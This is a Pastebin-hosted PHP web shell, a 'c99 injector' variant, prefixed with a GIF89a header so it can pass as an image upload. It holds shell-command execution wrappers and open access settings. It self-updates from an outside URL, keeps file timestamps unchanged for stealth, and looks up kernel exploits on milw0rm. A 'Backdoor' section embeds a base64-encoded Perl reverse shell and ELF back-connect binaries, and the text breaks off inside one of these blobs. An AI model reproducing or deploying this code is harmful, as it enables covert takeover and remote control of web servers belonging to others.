_tl_

34e3a3a74f6e2d0f236bdd3ba70c0c03.php

Feb 1st, 2012
557
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 192.24 KB | None | 0 0
  1. GIF89a?????ÿÿÿ???!ù????,???????D?;?
  2. <?php
  3. /*******************************************/
  4. /* c99 injector v1 09.2011                 */
  5. /* Re-coded or modified By s4l1ty          */
  6. /*******************************************/
  7. $sh_id = "SkFOQ09L=";
  8. $sh_ver = "- exploit";
  9. $sh_name = base64_decode($sh_id).$sh_ver;
  10. $sh_mainurl = "http://s4l1ty.binhoster.com";
  11. $html_start = ''.
  12. '<html><head>
  13. <title>'.$sh_name. ' - '.getenv("HTTP_HOST").'</title>
  14. <style type="text/css">
  15. <!--
  16. body,table { font-family:verdana;font-size:11px;color:red;background-color:black; }
  17. table { width:100%; }
  18. table,td { border:1px solid #00752D;margin-top:2;margin-bottom:2;padding:5px; }
  19. a { color:lightblue;text-decoration:none; }
  20. a:active { color:#00FF00; }
  21. a:link { color:#00FF00; }
  22. a:hover { text-decoration:underline; }
  23. a:visited { color:#99CCFF; }
  24. input,select,option { font:8pt tahoma;color:#FFFFFF;margin:2;border:1px solid #FF0000; }
  25. textarea { color:#dedbde;font:fixedsys bold;border:1px solid #666666;margin:2; }
  26. .fleft { float:left;text-align:left; }
  27. .fright { float:right;text-align:right; }
  28. #pagebar { font:10pt tahoma;padding:5px; border:3px solid #1E1E1E; border-collapse:collapse; }
  29. #pagebar td { vertical-align:top; }
  30. #pagebar p { font:8pt tahoma;}
  31. #pagebar a { font-weight:bold;color:#00FF00; }
  32. #pagebar a:visited { color:#00FF00; }
  33. #mainmenu { text-align:center; }
  34. #mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }
  35. #maininfo,.barheader,.barheader2 { text-align:center; }
  36. #maininfo td { padding:3px; }
  37. .barheader { font-weight:bold;padding:5px; }
  38. .barheader2 { padding:5px;border:2px solid #1F1F1F; }
  39. .contents,.explorer { border-collapse:collapse;}
  40. .contents td { vertical-align:top; }
  41. .mainpanel { border-collapse:collapse;padding:5px; }
  42. .barheader,.mainpanel table,td { border:1px solid #333333; }
  43. .mainpanel input,select,option { border:1px solid #FF0000;margin:0; }
  44. input[type="submit"] { border:1px solid #FF0000; }
  45. input[type="text"] { padding:3px;}
  46. .shell { background-color:#C0C0C0;color:#000080;padding:5px; }
  47. .fxerrmsg { color:red; font-weight:bold; }
  48. #pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }
  49. #pagebar,.mainpanel,input[type="submit"] { background-color:#4A4A4A; }
  50. .barheader2,input,select,option,input[type="submit"]:hover { background-color:#333333; }
  51. textarea,.mainpanel input,select,option { background-color:#000000; }
  52. // -->
  53. </style>
  54.  </head>
  55. <body>
  56. ';
  57. //Authentication
  58. $login = "";  
  59. $pass = "";
  60. $md5_pass = "md5($pass)"; //Password yg telah di enkripsi dg md5. Jika kosong, md5($pass).
  61. $host_allow = array("*"); //Contoh: array("192.168.0.*","127.0.0.1")
  62. $login_txt = "Restricted Area"; //Pesan HTTP-Auth
  63. $accessdeniedmess = "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied";
  64. $gzipencode = TRUE;
  65. $updatenow = FALSE; //Jika TRUE, update shell sekarang.
  66. $c99sh_updateurl = $sh_mainurl."ipays.php";
  67. $c99sh_sourcesurl = $sh_mainurl."passs.txt";
  68. //$c99sh_updateurl = "http://www.utama-audio.com/ipays/tool/";
  69. //$c99sh_sourcesurl = "http://www.utama-audio.com/ipays/tool/passs.txt";
  70. $filestealth = TRUE; //TRUE, tidak merubah waktu modifikasi dan akses.
  71. $curdir = "./";
  72. $tmpdir = "";  
  73. $tmpdir_log = "./";
  74. $log_email = "s4l1ty@hotmail.com"; //email untuk pengiriman log.
  75. $sort_default = "0a"; //Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
  76. $sort_save = TRUE; //Jika TRUE, simpan posisi pengurutan menggunakan cookies.
  77. $sess_cookie = "c99shvars"; //Nama variabel Cookie
  78. $usefsbuff = TRUE; //Buffer-function
  79. $copy_unset = FALSE; //Hapus file yg telah di-copy setelah dipaste
  80. $hexdump_lines = 8;
  81. $hexdump_rows = 24;
  82. $win = strtolower(substr(PHP_OS,0,3)) == "win";
  83. $disablefunc = @ini_get("disable_functions");
  84. if (!empty($disablefunc)) {
  85.   $disablefunc = str_replace(" ","",$disablefunc);
  86.   $disablefunc = explode(",",$disablefunc);
  87. }
  88. //Functions
  89. function get_phpini() {
  90.   function U_wordwrap($str) {
  91.     $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
  92.     return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
  93.   }
  94.   function U_value($value) {
  95.     if ($value == '') return '<i>no value</i>';
  96.     if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
  97.     if ($value === null) return 'NULL';
  98.     if (@is_object($value)) $value = (array) $value;
  99.     if (@is_array($value)) {
  100.       @ob_start();
  101.       print_r($value);
  102.       $value = @ob_get_contents();
  103.       @ob_end_clean();
  104.     }
  105.     return U_wordwrap((string) $value);
  106.   }
  107.   if (@function_exists('ini_get_all')) {
  108.     $r = "";
  109.     echo "<table><tr class=barheader><td>Directive</td><td>Local Value</td><td>Global Value</td></tr>";
  110.     foreach (@ini_get_all() as $key=>$value) {
  111.       $r .= "<tr><td>".$key."</td><td><div align=center>".U_value($value['local_value'])."</div></td><td><div align=center>".U_value($value['global_value'])."</div></td></tr>";
  112.     }
  113.     echo $r;
  114.     echo "</table>";
  115.   }
  116. }
  117. function disp_drives($curdir,$surl) {
  118.   $letters = "";
  119.   $v = explode("\\",$curdir);
  120.   $v = $v[0];
  121.   foreach (range("A","Z") as $letter) {
  122.     $bool = $isdiskette = $letter == "A";
  123.     if (!$bool) {$bool = is_dir($letter.":\\");}
  124.     if ($bool) {
  125.       $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".
  126.      ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"")."> [";
  127.       if ($letter.":" != $v) {$letters .= $letter;}
  128.       else {$letters .= "<font color=yellow>".$letter."</font>";}
  129.       $letters .= "]</a> ";
  130.     }
  131.   }
  132.   if (!empty($letters)) {Return $letters;}
  133.   else {Return "None";}
  134. }
  135. if (is_callable("disk_free_space")) {
  136.   function disp_freespace($curdrv) {
  137.     $free = disk_free_space($curdrv);
  138.     $total = disk_total_space($curdrv);
  139.     if ($free === FALSE) {$free = 0;}
  140.     if ($total === FALSE) {$total = 0;}
  141.     if ($free < 0) {$free = 0;}
  142.    if ($total < 0) {$total = 0;}
  143.    $used = $total-$free;
  144.    $free_percent = round(100/($total/$free),2)."%";
  145.    $free = view_size($free);
  146.    $total = view_size($total);
  147.    return "$free of $total ($free_percent)";
  148.  }
  149. }
  150. //w4ck1ng Shell
  151. if (!function_exists("myshellexec")) {
  152.  if(is_callable("popen")) {
  153.    function myshellexec($cmd) {
  154.      if (!($p=popen("($cmd)2>&1","r"))) { return "popen Disabled!"; }
  155.       while (!feof($p)) {
  156.         $line=fgets($p,1024);
  157.         $out .= $line;
  158.       }
  159.       pclose($p);
  160.       return $out;
  161.     }
  162.   } else {
  163.     function myshellexec($cmd) {
  164.       global $disablefunc;
  165.       $result = "";
  166.       if (!empty($cmd)) {
  167.         if (is_callable("exec") and !in_array("exec",$disablefunc)) {
  168.           exec($cmd,$result);
  169.           $result = join("\n",$result);
  170.         } elseif (($result = $cmd) !== FALSE) {
  171.         } elseif (is_callable("system") and !in_array("system",$disablefunc)) {
  172.           $v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
  173.         } elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {
  174.           $v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
  175.         } elseif (is_resource($fp = popen($cmd,"r"))) {
  176.           $result = "";
  177.           while(!feof($fp)) { $result .= fread($fp,1024); }
  178.           pclose($fp);
  179.         }
  180.       }
  181.       return $result;
  182.     }
  183.   }
  184. }
  185. function ex($cfe) {
  186.   $res = '';
  187.   if (!empty($cfe)) {
  188.     if(function_exists('exec')) {
  189.       @exec($cfe,$res);
  190.       $res = join("\n",$res);
  191.     } elseif(function_exists('shell_exec')) {
  192.       $res = @shell_exec($cfe);
  193.     } elseif(function_exists('system')) {
  194.       @ob_start();
  195.       @system($cfe);
  196.       $res = @ob_get_contents();
  197.       @ob_end_clean();
  198.     } elseif(function_exists('passthru')) {
  199.       @ob_start();
  200.       @passthru($cfe);
  201.       $res = @ob_get_contents();
  202.       @ob_end_clean();
  203.     } elseif(@is_resource($f = @popen($cfe,"r"))) {
  204.       $res = "";
  205.       while(!@feof($f)) { $res .= @fread($f,1024); }
  206.       @pclose($f);
  207.     } else { $res = "Ex() Disabled!"; }
  208.   }
  209.   return $res;
  210. }
  211. function which($pr) {
  212.   $path = ex("which $pr");
  213.   if(!empty($path)) { return $path; } else { return $pr; }
  214. }
  215. //End of w4ck1ng Shell
  216.  
  217. //Start Enumerate function
  218. $hostname_x = php_uname(n);
  219. $itshome = getcwd();
  220. if (!$win) {
  221.   $itshome = str_replace("/home/","~",$itshome);
  222.   $itshome = str_replace("/public_html","/yx29sh.php",$itshome);
  223. }
  224. else { $itshome = ""; }
  225. $enumerate = "http://".$hostname_x."/".$itshome."";
  226. //End Enumerate function
  227.  
  228. //milw0rm search
  229. $Lversion = php_uname(r);
  230. $OSV = php_uname(s);
  231. if(eregi("Linux",$OSV)) {
  232.   $Lversion=substr($Lversion,0,6);
  233.   $millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
  234. } else {
  235.   $Lversion=substr($Lversion,0,3);
  236.   $millink ="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
  237. }
  238. //End of milw0rm search
  239.  
  240. //Backdoor
  241. $back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
  242. $back_connect_c = "f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+D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EgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RyxwByx0RUT1JfTElTVF9fAF9fSkNSX0xJU1RyxwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRyxwByx0RUT1JfRU5EX18AX19GUkFNRV9FTkRyxwByx0pDUl9FTkRyxwByx2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZAByx2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMAByx2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMAByx2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMAByx2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
  243. $backdoor = "f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAA